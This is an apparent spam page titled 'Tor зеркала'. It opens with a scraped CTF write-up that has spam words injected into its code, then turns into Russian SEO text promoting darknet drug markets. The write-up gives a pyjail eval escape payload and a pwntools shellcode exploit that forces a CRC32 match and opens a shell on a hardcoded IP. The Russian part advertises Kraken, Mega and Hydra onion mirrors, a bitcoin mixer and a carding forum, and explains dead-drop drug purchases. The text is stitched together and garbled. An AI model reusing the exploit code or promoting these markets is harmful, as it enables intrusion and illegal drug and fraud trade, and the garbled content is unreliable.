Tor зеркала

This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = kracc strlen(buf); if (l * kragl l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 kraat import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related

Tor зеркала - Kra11at

Wired, его вдохновил успех американской торговой площадки. Мешки для сбора спермы sale DIN 931 Винты с шестигранной головкой метрические 8,8, оцинкованные. Следом за ней кнопка вашего личного профиля на kraken официальный сайт онион, там можно настроить профиль по вашему желанию. Сообщается, что лишилась всех своих голов - крупнейший информационный России посвященный ssylka компьютерам, мобильным устройствам. Разумеется, подавляющему числу людей нечего скрывать, но крайне неприятно осознавать, что ты находишься под постоянным колпаком спецуры, каждый твой шаг отслеживается и фиксируется, и кто-то регулярно пытается поковыряться своими шкодливыми ручонками в твоём «грязном белье». После открытия, программа самостоятельно настроит соединение (мосты) чтобы зайти анонимно в darknet маркетплейс. На данный момент обе площадки примерно одинаково популярны и ничем не уступают друг другу по функционалу и своим возможностям. Нет, зарегистрироваться сейчас. Жека 3 дня назад Работает! Подробнее Вариант. Вход с двухфакторной аутентификацией. Пополните свой счет биткоин кошелька при помощи обменников или переведите деньги со стороннего ресурса. Самым простым способом попасть на сайт Mega DarkMarket является установка браузера Тор или VPN, без них будет горазда сложнее. I2p, оче медленно грузится. Причём недавно появились инструменты, которые продолжают эксплуатировать мощности вашего компьютера, даже когда вы закрыли браузер (остаётся невидимое окно). Кракен найти зеркало, сайт тор зайти на kraken, рабочая ссылка на kraken онион, как называется сайт кракен onion top, рабочие зеркала крамп даркнет, рабочая ссылка крамп в тор, офф зеркало крамп, официальная kraken. Верификация это процедура проверки личности трейдера, в ходе которой он предоставляет свои персональные данные и документы, подтверждающие. Остерегайтесь мошенников! Onion - Verified,.onion зеркало кардинг форума, стоимость регистрации. ОФициальные зеркала сайта kramp. Итак, это безопасный и анонимный инструмент связи. Совершить обмен валюты на биткоин можно непосредственно на сайте Кракен при помощи доверенных, анонимных обменников. Подводя итоги, напомним, что в статье про даркнет сайты мы подробно описали какими пользоваться нельзя, а какими можно. Cc onion, новый сайт крамп onion, правильный сайт крамп kraken ssylka onion, зайти в обход блокировки на kraken, оригинальный сайт крамп для тора. Kpynyvym6xqi7wz2.onion - онион ParaZite олдскульный сайтик, большая коллекция анархичных файлов и подземных ссылок. Onion - Bitmessage Mail Gateway  сервис позволяет законнектить Bitmessage с электронной почтой, можно писать на емайлы или на битмесседж protonirockerxow. Весь товар на маркетплэйсе регулярно проверяется администрацией с использованием системы тайных покупателей. Сам же сайт включает в себя множество функций которые помогают купить или продать вес буквально автоматизированно, и без лишних третьих лиц. В 2019 году «Лента. Интересна опция «Kill Switch» для экстренной остановки соединения при угрозах, «Nat Firewall» для защиты личных данных при работе в wi-fi сетях и «Split Tunneling» для настройки параметров региональных IP-адресов для ресурсов. Регистрация При регистрации учетной записи вам предстоит придумать логин, отображаемое имя и пароль. Откройте блок, содержащий информацию о нужной версии операционной системы. Foggeddriztrcar2.onion - Bitcoin Fog  микс-сервис для очистки биткоинов, наиболее старый и проверенный, хотя кое-где попадаются отзывы, что это скам и очищенные биткоины так и не при приходят их владельцам. Условно бесплатная Windows iPhone Mac OS Browsec шифрует ваш трафик и направляет его через нашу безопасную облачную сеть. Регистрация на бирже Kraken Отметим, что при указании пароля необходимо использовать буквы, цифры и специальные символы. Он получил два пожизненных срока за хакерство, наркоторговлю, а также за заказ целых шести убийств. P/tor/192-sajty-seti-tor-poisk-v-darknet-sajty-tor2 *источники ссылок http doe6ypf2fcyznaq5.onion, / *просим сообщать о нерабочих ссылках внизу в комментариях! Купить запчасти для сельхозтехники в интернет-магазине. Этот вариант не позволяет Onion Browser обеспечивать такой же высокий уровень защиты приватности, как Tor Browser. Поиск и навигация по категориям помогут вам в этом.

Прекратим о грустном. Наша задача вас предупредить, а вы уже всегда думайте своей головой, а Мега будет думать тремя! Располагается в темной части интернета, в сети Tor. Когда вы пройдете подтверждение, то перед вами откроется прекрасный мир интернет магазина Мега и перед вами предстанет шикарный выбор все возможных товаров. Подробнее: Криптовалютные кошельки: Биткоин, Ефириум, и другие малоизвестные кошельки Банковские карты: Отсутствуют! Если же ничего не заполнять в данной строке, то Мега даст вам все возможные варианты, которые только существуют. Интуитивное управление Сайт сделан доступным и понятным для каждого пользователя, независимо от его навыков. Онлайн системы платежей: Не работают! Каждый продавец выставляет продукты узкой направленности: В одном магазине можно купить инструменты и приборы. Самым простым способом попасть на сайт Mega DarkMarket является установка браузера Тор или VPN, без них будет горазда сложнее. Постараюсь объяснить более обширно. После всего проделанного система сайт попросит у вас ввести подтверждение на то, что вы не робот. Некоторые продавцы не отправляют товар в другие города или их на данный момент нет в наличии. Мега Даркнет не работает что делать? Если же вы вошли на сайт Меге с определенным запросом, то вверху веб странички платформы вы найдете строку поиска, которая выдаст вам то, что вам необходимо. Ещё одним решением послужит увеличение вами приоритета, а соответственно комиссии за транзакцию, при переводе Биткоинов. Вместо курьера вы получите адрес и описание места где забрать заказ. Если для вас главное цена, то выбирайте в списке любой, а если для вас в приоритете место товара и вы не хотите тратить много времени тогда выбирайте вариант моментальной покупки. Зеркало это такая же обычная ссылка, просто она предназначена для того чтобы получить доступ к ресурсу, то есть обойти запрет, ну, в том случае, если основная ссылка заблокирована теми самыми дядьками в погонах. Так же есть ещё и основная ссылка для перехода в логово Hydra, она работает на просторах сети onion и открывается только с помощью Tor браузера - http hydraruzxpnew4аf. Что можно купить на Гидре Если кратко всевозможные запрещенные товары. Форум Меге это же отличное место находить общие знакомства в совместных интересах, заводить, может быть, какие-то деловые связи. На самом деле в интернете, как в тёмном, так и в светлом каждый день появляются сотни тысяч так называемых «зеркал» для всевозможных сайтов. Даже если он будет выглядеть как настоящий, будьте бдительны, это может быть фейковая копия. Т.е. Немного подождав попадёте на страницу где нужно ввести проверочный код на Меге Даркнет. Одним из самых простых способов войти в Мегу это использовать браузер Тор. Важно понимать, на экранах мобильной версии и ПК версии, сайт магазина выглядит по-разному. Выбирая на магазине Мега Даркнет анонимные способы оплаты, типа Биткоин, вы дополнительно страхуете себя. А что делать в таком случае, ответ прост Использовать официальные зеркала Мега Даркнет Маркета Тор, в сети Онион. Если подробно так как Гидра является маркетплейсом, по сути сборником магазинов и продавцов, товары предлагаемые там являются тематическими. Ещё одной причиной того что, клад был не найден это люди, у которых нет забот ходят и рыщут в поисках очередного кайфа просто «на нюх если быть более точным, то они ищут клады без выданных представителем магазина координат. Форум Меге неизбежный способ ведения деловой политики сайта, генератор гениальных идей и в первую очередь способ получения информации непосредственно от самих потребителей. Mega Darknet Market Вход Чтобы зайти на Мегу используйте Тор-браузер или ВПН. Привычным способом товар не доставляется, по сути это магазин закладок. Пользуйтесь, и не забывайте о том что, на просторах тёмного интернета орудуют тысячи злобных пиратов, жаждущих вашего золота. Оригинальный сайт: ore (через TOR browser) / (через Тор) / (онион браузер).Сборник настоящих, рабочих ссылок на сайт мега в Даркнете, чтобы вы через правильное, рабочее зеркало попали на официальный сайт Меги. Моментальный это такой способ покупки, когда вам показаны только варианты когда покупка мгновенная, то есть без подтверждения продавца. После того как вы его скачаете и установите достаточно будет просто в поисковой строке вбить поисковой запрос на вход в Hydra. Выглядит Капча Меги так: После успешного ввода капчи на главной странице, вы зайдете на форму входа Меги. Подборка Marketplace-площадок by LegalRC Площадки постоянно атакуют друг друга, возможны долгие подключения и лаги. Как выглядит рабочий сайт Mega Market Onion. Быстрота действия Первоначально написанная на современном движке, mega darknet market не имеет проблем с производительностью с огромным количеством информации. Ссылка на мегу. Стоит помнить внешний вид Мега Шопа, чтобы не попасть на фейки. Это используется не только для Меге.